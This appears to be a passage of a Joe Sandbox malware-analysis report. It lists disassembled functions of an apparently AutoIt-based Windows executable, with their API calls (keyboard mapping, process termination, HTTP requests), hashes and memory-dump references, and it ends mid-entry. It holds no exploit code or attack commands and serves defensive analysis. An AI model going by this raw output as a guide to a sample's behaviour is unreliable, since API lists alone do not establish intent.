                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2942034483-0
                                                                                                                                  • Opcode ID: ca53088234265bed28c7bfd8d2a8a7a1da52c2901c7af7fe143c9158f00f4244
                                                                                                                                  • Instruction ID: 2502090ec27ddaa85c84ab324216c0640039306719b3df04c8451db968905c46
                                                                                                                                  • Opcode Fuzzy Hash: ca53088234265bed28c7bfd8d2a8a7a1da52c2901c7af7fe143c9158f00f4244
                                                                                                                                  • Instruction Fuzzy Hash: 5BF06D331197115AE26877387F06F5A26C08F41776BA03A2EF860F54D2FF5388534151
                                                                                                                                  Function 00EEA3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1423608774-0
                                                                                                                                  • Opcode ID: 458635794332dcf44cb4df37c5edcfcb99ec4d43bc8054ac04d9bb5f4188df5c
                                                                                                                                  • Instruction ID: bdb6b77c14709e481a1daaa57221da0a7c0a297df6abd43eb98c5e1517609bef
                                                                                                                                  • Opcode Fuzzy Hash: 458635794332dcf44cb4df37c5edcfcb99ec4d43bc8054ac04d9bb5f4188df5c
                                                                                                                                  • Instruction Fuzzy Hash: 8D018132101259EBD7292F55ED48DEF77A9FF89702B041529F503A24A1CB64A802DBA1
                                                                                                                                  Function 00EA1867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EA1898
                                                                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00EA18A0
                                                                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EA18AB
                                                                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EA18B6
                                                                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00EA18BE
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EA18C6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Virtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4278518827-0
                                                                                                                                  • Opcode ID: 758a3a60b61f4e226fd30bc353ac5704e6ffc40ed2cc773972339cb3f141d4cf
                                                                                                                                  • Instruction ID: 4842e1a9f88c05843a8d2a26768a59fee4a48d75b9c568f3e9e3db1742a1b956
                                                                                                                                  • Opcode Fuzzy Hash: 758a3a60b61f4e226fd30bc353ac5704e6ffc40ed2cc773972339cb3f141d4cf
                                                                                                                                  • Instruction Fuzzy Hash: 470144B0902B5ABDE3008F6A8C85A52FEA8FF19354F04411BA15C47A42C7B5A864CBE5
                                                                                                                                  Function 00EE84F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00EE8504
                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00EE851A
                                                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00EE8529
                                                                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EE8538
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EE8542
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EE8549
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 839392675-0
                                                                                                                                  • Opcode ID: d298bc23ed01eafa179335448e2512e284bcbd3f62785a2b53a6f13bc2adc2d7
                                                                                                                                  • Instruction ID: 0814ef3e63f89b0dc37eda3475c669ef3c31c8a0e400189fe45d8085838f39ef
                                                                                                                                  • Opcode Fuzzy Hash: d298bc23ed01eafa179335448e2512e284bcbd3f62785a2b53a6f13bc2adc2d7
                                                                                                                                  • Instruction Fuzzy Hash: 01F03A7264119CBBE7315BA29D0EEEF7E7CDFC6B15F000058FA05A1050EBA06A02E6B5
                                                                                                                                  Function 00EEA31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00EEA330
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 00EEA341
                                                                                                                                  • TerminateThread.KERNEL32(?,000001F6,?,?,?,00F166D3,?,?,?,?,?,00EAE681), ref: 00EEA34E
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00F166D3,?,?,?,?,?,00EAE681), ref: 00EEA35B
                                                                                                                                    • Part of subcall function 00EE9CCE: CloseHandle.KERNEL32(?,?,00EEA368,?,?,?,00F166D3,?,?,?,?,?,00EAE681), ref: 00EE9CD8
                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EEA36E
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 00EEA375
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3495660284-0
                                                                                                                                  • Opcode ID: 0bb714cd24e73d904bf21d44d9e95f2ad31275be69b728d13797f97732ce5a82
                                                                                                                                  • Instruction ID: d01d21456ac50f769ce97767def06860a56682479d57638f37e27d804f64347c
                                                                                                                                  • Opcode Fuzzy Hash: 0bb714cd24e73d904bf21d44d9e95f2ad31275be69b728d13797f97732ce5a82
                                                                                                                                  • Instruction Fuzzy Hash: 24F08232141219EBD3252F64ED4CDEF7B79FF89302B041525F203A10E5CBB5A852EB61
                                                                                                                                  Function 00EAC320 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 259fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memmove.LIBCMT ref: 00EAC419
                                                                                                                                  • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00EE6653,?,?,00000000), ref: 00EAC495
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileRead_memmove
                                                                                                                                  • String ID: Sf
                                                                                                                                  • API String ID: 1325644223-3555655682
                                                                                                                                  • Opcode ID: ac4179c6bc1cab6da7911b1092582c04fe9d4c301448bdc7cf300873cdb89123
                                                                                                                                  • Instruction ID: c3c9a82b95b85d617c7d87f38cea096290fdf4591c216b4df17df29e4955cf45
                                                                                                                                  • Opcode Fuzzy Hash: ac4179c6bc1cab6da7911b1092582c04fe9d4c301448bdc7cf300873cdb89123
                                                                                                                                  • Instruction Fuzzy Hash: 65A1AE70A04609EBDF00CF65C880BADFBB0FF0A310F24D195E865AE291D735E965DB91
                                                                                                                                  Function 00EBD7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EC010A: std::exception::exception.LIBCMT ref: 00EC013E
                                                                                                                                    • Part of subcall function 00EC010A: __CxxThrowException@8.LIBCMT ref: 00EC0153
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                    • Part of subcall function 00EABBD9: _memmove.LIBCMT ref: 00EABC33
                                                                                                                                  • __swprintf.LIBCMT ref: 00EBD98F
                                                                                                                                  Strings
                                                                                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00EBD832
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                  • API String ID: 1943609520-557222456
                                                                                                                                  • Opcode ID: 581b6fb8d62a966d214088d124d92936e6bfec6974af2b2bccd6a9d3fc363d75
                                                                                                                                  • Instruction ID: f664b57124c538f058e43a31463c03bf93031df632157cce6866796649e93a1d
                                                                                                                                  • Opcode Fuzzy Hash: 581b6fb8d62a966d214088d124d92936e6bfec6974af2b2bccd6a9d3fc363d75
                                                                                                                                  • Instruction Fuzzy Hash: 259159725082419FC714EF24CC85DABBBF4AF8A710F00591DF596AB2A1EB70EE44DB52
                                                                                                                                  Function 00EFB482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00EFB4A8
                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00EFB5B7
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00EFB73A
                                                                                                                                    • Part of subcall function 00EEA6F6: VariantInit.OLEAUT32(00000000), ref: 00EEA736
                                                                                                                                    • Part of subcall function 00EEA6F6: VariantCopy.OLEAUT32(?,?), ref: 00EEA73F
                                                                                                                                    • Part of subcall function 00EEA6F6: VariantClear.OLEAUT32(?), ref: 00EEA74B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                  • API String ID: 4237274167-1221869570
                                                                                                                                  • Opcode ID: 2b9f3b2d4a3d4a26e4988566baeae372624f061e898cce0ec3aa8e9fab1088ed
                                                                                                                                  • Instruction ID: f6d8726cea7964e77c85b3573df43281fc2d278cea2b9d304e4789c83abfdedc
                                                                                                                                  • Opcode Fuzzy Hash: 2b9f3b2d4a3d4a26e4988566baeae372624f061e898cce0ec3aa8e9fab1088ed
                                                                                                                                  • Instruction Fuzzy Hash: 8F919D746083059FC710EF24C48096ABBE5EFC9714F14586EF99AEB361DB30E945CB52
                                                                                                                                  Function 00EE1050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00EE10B8
                                                                                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00EE10EE
                                                                                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00EE10FF
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00EE1181
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                  • String ID: DllGetClassObject
                                                                                                                                  • API String ID: 753597075-1075368562
                                                                                                                                  • Opcode ID: 1389cc8c4ea333e576c1ca9a8e643d134d7a2769c0932e00449d7c496ffc0c27
                                                                                                                                  • Instruction ID: eda8f5d00befa1e91dafe1b69c46d2f6b7cb733bc5a2d25ada226b68ea49e3bd
                                                                                                                                  • Opcode Fuzzy Hash: 1389cc8c4ea333e576c1ca9a8e643d134d7a2769c0932e00449d7c496ffc0c27
                                                                                                                                  • Instruction Fuzzy Hash: 9E419BB1601248EFDB15CF56CC84B9A7BA9EF45354F1090EDEA09EF206D7B0D984DBA0
                                                                                                                                  Function 00EE5A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00EE5A93
                                                                                                                                  • GetMenuItemInfoW.USER32 ref: 00EE5AAF
                                                                                                                                  • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00EE5AF5
                                                                                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F618F0,00000000), ref: 00EE5B3E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 1173514356-4108050209
                                                                                                                                  • Opcode ID: cd02dc7623f2fa38ecbab8e3d933860a659867957f868e1a0c01d871d40bb50e
                                                                                                                                  • Instruction ID: 40a6c0a41b954c2b951ffaf43daf4279730928aaaeb8691647a68d9cda34c689
                                                                                                                                  • Opcode Fuzzy Hash: cd02dc7623f2fa38ecbab8e3d933860a659867957f868e1a0c01d871d40bb50e
                                                                                                                                  • Instruction Fuzzy Hash: A141B2322047859FD720DF25D881B5AB7E4AF89318F044A2EF955AB2D1D770E800CB62
                                                                                                                                  Function 00F00458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharLowerBuffW.USER32(?,?,?,?), ref: 00F00478
                                                                                                                                    • Part of subcall function 00EA7F40: _memmove.LIBCMT ref: 00EA7F8F
                                                                                                                                    • Part of subcall function 00EAA2FB: _memmove.LIBCMT ref: 00EAA33D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove$BuffCharLower
                                                                                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                                                                                  • API String ID: 2411302734-567219261
                                                                                                                                  • Opcode ID: a35b7a79c30ea8101070b25f4a5b7607e68615a91730fae9f6763463a0e15b44
                                                                                                                                  • Instruction ID: eb2ab920204104a97b52f2632efc6de3be1d2558a38bc5c2167393a8d6fad68d
                                                                                                                                  • Opcode Fuzzy Hash: a35b7a79c30ea8101070b25f4a5b7607e68615a91730fae9f6763463a0e15b44
                                                                                                                                  • Instruction Fuzzy Hash: C5317E35900619ABCB04DF58CC40AEEB3A5FF09320F149629E962AB2D5DB31A905EB40
                                                                                                                                  Function 00EDC600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00EDC684
                                                                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00EDC697
                                                                                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00EDC6C7
                                                                                                                                    • Part of subcall function 00EA7E53: _memmove.LIBCMT ref: 00EA7EB9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$_memmove
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 458670788-1403004172
                                                                                                                                  • Opcode ID: 9e48f02d0fdd142f12bc4812f80d81d1516157020514935bdae818b966dbfafd
                                                                                                                                  • Instruction ID: 036b93caebe58673b1e85a4d41f62f664adeda57680796b3fd398178adfe04a8
                                                                                                                                  • Opcode Fuzzy Hash: 9e48f02d0fdd142f12bc4812f80d81d1516157020514935bdae818b966dbfafd
                                                                                                                                  • Instruction Fuzzy Hash: A321E671900108AEDB14AB64CC45DFEB7A9DF4A754B24611AF432F72D0DB789D0BD650
                                                                                                                                  Function 00EF4A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EF4A60
                                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EF4A86
                                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EF4AB6
                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00EF4AFD
                                                                                                                                    • Part of subcall function 00EF56A9: GetLastError.KERNEL32(?,?,00EF4A2B,00000000,00000000,00000001), ref: 00EF56BE
                                                                                                                                  Strings
